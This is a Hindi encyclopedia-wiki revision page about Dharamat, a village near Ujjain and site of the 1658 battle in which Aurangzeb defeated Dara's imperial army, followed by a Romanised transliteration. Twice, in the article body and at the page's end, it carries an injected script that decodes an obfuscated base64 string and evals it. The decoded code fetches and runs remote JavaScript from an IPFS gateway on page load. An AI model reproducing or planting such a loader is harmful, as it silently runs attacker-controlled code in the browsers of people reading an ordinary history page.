Difference between revisions of "धरमत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "तेजी " to "तेज़ी")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''धरमत''' आधुनिक [[मध्य प्रदेश]] में [[उज्जैन]] से 14 मील दूर [[गंभीरा नदी]]<ref>प्राचीन गंभीरा</ref> के [[तट]] पर स्थित एक छोटा-सा ग्राम धरमत है।  
 
+
*धरमत [[मुग़ल काल]] में एक महत्त्वपूर्ण युद्ध के लिए जाना जाता है।  
*आधुनिक [[मध्य प्रदेश]] में [[उज्जैन]] से 14 मील दूर गंभीर (प्राचीन गंभीरा) नदी के तट पर स्थित एक छोटा-सा ग्राम धरमत है।  
 
*यह स्थान [[मुग़ल काल]] में एक महत्त्वपूर्ण युद्ध के लिए जाना जाता है।  
 
 
*[[15 अप्रैल]], 1658 को जब [[शाहजहाँ]] बीमार था, तब इस स्थान पर शाही सेना, जिसका नेतृत्व दारा के साथ राजा जसवंतसिंह एवं कासिम अली कर रहे थे और [[औरंगजेब]], जिसके साथ मुराद था, के मध्य युद्ध हुआ।<ref>[[धरमत का युद्ध]]</ref>
 
*[[15 अप्रैल]], 1658 को जब [[शाहजहाँ]] बीमार था, तब इस स्थान पर शाही सेना, जिसका नेतृत्व दारा के साथ राजा जसवंतसिंह एवं कासिम अली कर रहे थे और [[औरंगजेब]], जिसके साथ मुराद था, के मध्य युद्ध हुआ।<ref>[[धरमत का युद्ध]]</ref>
*इस युद्ध में शाही फौज बुरी तरह परास्त हुई।  
+
*इस युद्ध में शाही फ़ौज बुरी तरह परास्त हुई।  
*औरंगजेब ने विजयी होकर [[दिल्ली]] की और तेजी से प्रस्थान किया।  
+
*औरंगजेब ने विजयी होकर [[दिल्ली]] की और तेज़ीसे प्रस्थान किया।  
*वह [[चम्बल नदी]] पार कर विजयी होकर दिल्ली की और तेजी से प्रस्थान किया।  
+
*वह [[चम्बल नदी]] पार कर विजयी होकर दिल्ली की और तेज़ीसे प्रस्थान किया।  
 
*वह चम्बल नदी पार कर [[आगरा]] से पूर्व में 8 मील पर स्थित [[सामूगढ़]] पहुँचा, जहाँ दारा के नेतृत्व में शाही फ़ौज से उसकी पुनः मुठभेड़ हुई।  
 
*वह चम्बल नदी पार कर [[आगरा]] से पूर्व में 8 मील पर स्थित [[सामूगढ़]] पहुँचा, जहाँ दारा के नेतृत्व में शाही फ़ौज से उसकी पुनः मुठभेड़ हुई।  
 
*दारा पराजित होकर भाग खड़ा हुआ।  
 
*दारा पराजित होकर भाग खड़ा हुआ।  
Line 16: Line 14:
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 +
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
 +
[[Category:मध्य प्रदेश]]
 +
[[Category:ऐतिहासिक_स्थान_कोश]]
 +
[[Category:मुग़ल साम्राज्य]]
 +
[[Category:मध्य काल]]
 
__INDEX__
 
__INDEX__
[[Category:मध्य_प्रदेश]][[Category:मध्य_प्रदेश_का_इतिहास]][[Category:मध्य_प्रदेश_के_ऐतिहासिक_स्थान]]
 

Latest revision as of 08:21, 10 February 2021

dharamat adhunik madhy pradesh mean ujjain se 14 mil door ganbhira nadi[1] ke tat par sthit ek chhota-sa gram dharamat hai.

  • dharamat mugal kal mean ek mahattvapoorn yuddh ke lie jana jata hai.
  • 15 aprail, 1658 ko jab shahajahaan bimar tha, tab is sthan par shahi sena, jisaka netritv dara ke sath raja jasavantasianh evan kasim ali kar rahe the aur aurangajeb, jisake sath murad tha, ke madhy yuddh hua.[2]
  • is yuddh mean shahi fauj buri tarah parast huee.
  • aurangajeb ne vijayi hokar dilli ki aur tezise prasthan kiya.
  • vah chambal nadi par kar vijayi hokar dilli ki aur tezise prasthan kiya.
  • vah chambal nadi par kar agara se poorv mean 8 mil par sthit samoogadh pahuancha, jahaan dara ke netritv mean shahi fauj se usaki punah muthabhe d huee.
  • dara parajit hokar bhag kh da hua.
  1. REDIRECTsaancha:inhean bhi dekhean

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. prachin ganbhira
  2. dharamat ka yuddh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>